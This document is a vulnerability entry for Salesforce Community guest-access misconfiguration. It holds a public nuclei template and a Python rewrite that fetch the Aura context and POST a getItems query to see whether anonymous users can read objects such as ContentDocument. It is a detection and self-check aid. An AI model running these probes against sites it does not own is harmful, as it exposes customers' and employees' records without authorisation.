A misconfigured Salesforce Community may lead to sensitive Salesforce data being exposed to anyone on the internet. Anonymous users can query objects that contain sensitive information such as customer lists, support cases, and employee email addresses.
PoC code [public]
id: salesforce-community-misconfig

info:
  name: Salesforce Community Misconfiguration
  author: domwhewell-sage
  severity: medium
  description: |
    A misconfigured Salesforce Community may lead to sensitive Salesforce data being exposed to anyone on the internet. Anonymous users can query objects that contain sensitive information such as customer lists, support cases, and employee email addresses.
  reference:
    - https://www.varonis.com/blog/abusing-salesforce-communities
    - https://www.enumerated.ie/index/salesforce
  metadata:
    verified: true
    publicwww-query: sfsites
  tags: aura,unauth,salesforce,exposure,misconfig,vuln

variables:
  actions: '{"actions":[{"id":"{{randstr}}","descriptor":"serviceComponent://ui.force.components.controllers.lists.selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems","callingDescriptor":"UNKNOWN","params":{"entityNameOrId":"ContentDocument","layoutType":"FULL","pageSize":20,"currentPage":0,"useTimeout":false,"getCount":true,"enableRowActions":false}}]}'

http:
  - method: GET
    path:
      - "{{RootURL}}/s/"

    redirects: true
    max-redirects: 1
    matchers:
      - type: status
        status:
          - 200
        internal: true

    extractors:
      - type: regex
        name: aura_context
        part: body
        group: 1
        regex:
          - '\/s\/sfsites\/l\/([a-zA-Z0-9\-_~.%]+)\/[^\/]+\.js'
        internal: true

  - method: POST
    path:
      - "{{RootURL}}/s/sfsites/aura"

    headers:
      Content-Type: application/x-www-form-urlencoded

    body: |
      message={{url_encode(actions)}}&aura.context={{aura_context}}&aura.token=null

    matchers:
      - type: word
        part: body
        words:
          - "recordTypeInfo"
# digest: 4a0a00473045022100a572fe733c24f31b3bdd8cc8591f29a111ac6239d3b8cca5119f8859f3390f80022002cd90211a9a2fac66be5e4c8272a4e966e37de1ceadff0d56b6d0ae9d7e124c:922c64590222798bb761d5b6d8e72950
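As an added example (not part of the nuclei template or its author's code), the three pieces of the template rewritten in Python so an Experience Cloud admin can verify their own site after tightening guest-user object permissions: extracting `aura.context` from the landing page, building the exact form body the template POSTs, and applying the `recordTypeInfo` matcher plus a structured check of the action state. The sample HTML and responses are constructed; function names are assumptions.

```python
import json
import re
from typing import Optional
from urllib.parse import quote

# Same regex as the template's extractor (group 1 is the URL-encoded aura.context).
AURA_CONTEXT_RE = re.compile(r"/s/sfsites/l/([a-zA-Z0-9\-_~.%]+)/[^/]+\.js")

GET_ITEMS_DESCRIPTOR = (
    "serviceComponent://ui.force.components.controllers.lists."
    "selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems"
)

# Constructed sample of a community landing page (not a real site).
SAMPLE_HTML = '<script src="/s/sfsites/l/%7B%22mode%22%3A%22PROD%22%7D/app.js"></script>'


def extract_aura_context(html: str) -> Optional[str]:
    """Step 1 of the template: pull aura.context out of the /s/ landing page."""
    match = AURA_CONTEXT_RE.search(html)
    return match.group(1) if match else None


def build_aura_body(aura_context: str, entity: str = "ContentDocument",
                    action_id: str = "selfcheck") -> str:
    """Step 2: the form body POSTed to /s/sfsites/aura, as the template builds it."""
    actions = {"actions": [{
        "id": action_id,
        "descriptor": GET_ITEMS_DESCRIPTOR,
        "callingDescriptor": "UNKNOWN",
        "params": {"entityNameOrId": entity, "layoutType": "FULL", "pageSize": 20,
                   "currentPage": 0, "useTimeout": False, "getCount": True,
                   "enableRowActions": False},
    }]}
    message = quote(json.dumps(actions, separators=(",", ":")), safe="")
    # aura_context is already URL-encoded, so it is appended as-is (no double encoding).
    return f"message={message}&aura.context={aura_context}&aura.token=null"


def is_exposed(response_body: str) -> bool:
    """Step 3: the template's word matcher, plus a check that getItems actually SUCCEEDED."""
    if "recordTypeInfo" not in response_body:
        return False
    try:
        data = json.loads(response_body)
    except ValueError:
        return True  # keep the template's substring-only behaviour on non-JSON bodies
    return any(a.get("state") == "SUCCESS" for a in data.get("actions", []))
```

A site that still returns SUCCESS for a guest session has objects readable by anonymous users; fix the guest user profile and sharing rules, then re-run.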